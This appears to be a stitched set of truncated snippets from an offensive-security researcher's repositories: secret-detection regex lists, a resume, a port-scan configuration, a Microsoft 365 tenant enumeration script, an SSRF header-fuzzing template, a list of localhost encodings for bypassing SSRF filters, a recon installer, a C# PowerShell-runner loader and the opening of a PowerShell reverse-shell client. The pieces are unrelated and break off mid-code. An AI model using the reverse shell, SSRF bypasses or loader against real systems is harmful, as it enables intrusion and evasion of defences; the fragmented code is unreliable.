ResistanceIsUseless

[
    {
        "name": "ADMIN_PASSWORD",
        "value": "(admin).+(secret|token|key|password).+"
    },
    {
        "name": "AWS API Gateway",
        "value": "[0-9a-z]+.execute-api.[0-9a-z.-_]+.amazonaws.com"
    },
    {

ResistanceIsUseless

[
    {
        "name": "base64",
        "value": "(eyJ|YTo|Tzo|PD[89]|rO0)[%a-zA-Z0-9+/]+={0,2}",
        "severity": "low"
    },
    {
        "name": "genericSecret",
        "key": "(secret|private|apikey)",
        "value": "[%a-zA-Z0-9+/]+"

ResistanceIsUseless

{
  "$schema": "https://raw.githubusercontent.com/jsonresume/resume-schema/v1.0.0/schema.json",
  "meta": {
    "theme": "elegant",
    "_documentation": "This resume was last updated in January 2025. Contact for latest version."
  },
  "basics": {
    "name": "Matthew Griffiths",
    "label": "Security Architect | General Hacker | GWAPT | GSEC",
    "image": "",

ResistanceIsUseless

### Probe Module to use
#probe-module tcp_synscan


### Destination port to scan
#web-services
target-port 80,443,999,1080,1880,1098,1099,2379,2443,3128,3443,3632,4001,4443,4848,5001,5002,5443,5800,5836,5985,5986,6002,6379,6782-6784,6739,6443,7001,7002,7071,7443,8000-8010,8080,8081,8118,8443,8444,8500,8888,9001,9060,9090,9093,9099,9100,9443,9901,9999,10000,10250,10255,10256,38801,53281

#all-interesting-ports
#target-port 7,9,13,21-23,25-26,37,53,79-81,88,106,110-111,113,119,135,139,143-144,179,199,389,427,443-445,465,513-515,543-544,548,554,587,631,646,873,990,993,995,1025-1029,1080,1098-1099,1100,1110,1433,1720,1723,1755,1880,1900,1990,2000-2001,2049,2121,2379,2380,2443,2717,3000,3128,3268,3269,3306,3389-3398,3443,3632,3886,3986,4001,4279,4443,4848,4899,5000,5001,5002,5009,5051,5060,5101,5190,53281,5357,5432,5631,5666,5800,5836,5900-5910,5985,5986,6000-6002,6379,6443,6646,6739,6782-6784,7001-7002,7070,7071,7443,8000-8010,8080-8081,8118,8443,8444,8500,8888,9001,9060,9090,9093,9099,9100,9443,9901,9999-10000,1

ResistanceIsUseless

#!/usr/bin/env python3

"""
Python script to enumerate valid Microsoft 365 domains, retrieve tenant name, and check for an MDI instance.
Based on: https://github.com/thalpius/Microsoft-Defender-for-Identity-Check-Instance.
Usage: ./check_mdi.py -d <domain>
"""

import argparse
import dns.resolver

ResistanceIsUseless

id: header-injection

info:
  name: Header SSRF Injection
  author: nullrabbit
  severity: high
  description: Fuzzing headers for OOB SSRF
  tags: fuzz,ssrf

requests:

ResistanceIsUseless

127.0.0.1
127.0.1.3
0
127.1
127.0.1
localhost
1.0.0.127.in-addr.arpa
01111111000000000000000000000001
0x7f.0x0.0x0.0x1
0177.0.0.01

ResistanceIsUseless

########################################
#	Configuration 
########################################
#Install Path needs /Scripts/Recon
InstallPath=/home/static/Tools
########################################

echo -e "\e[92m[*] Install Go Packages [*]"
#Aquatone Website Image Snapshot - https://michenriksen.com/blog/aquatone-now-in-go/
go get -u "github.com/michenriksen/aquatone"

ResistanceIsUseless

//Credits to Casey Smith for his initial research here "https://gist.github.com/subTee/ca477b4d19c885bec05ce238cbad6371"
//Based on Jared Haight work (https://github.com/jaredhaight/PSAttack)
//1. Compile "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:PSA64.exe PSA64.cs"
using System;
using System.Reflection;

namespace PSA64
{
    class Program
    {

ResistanceIsUseless

$socket = new-object System.Net.Sockets.TcpClient('127.0.0.1', 413);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do
{
	$writer.Flush();
	$read = $null;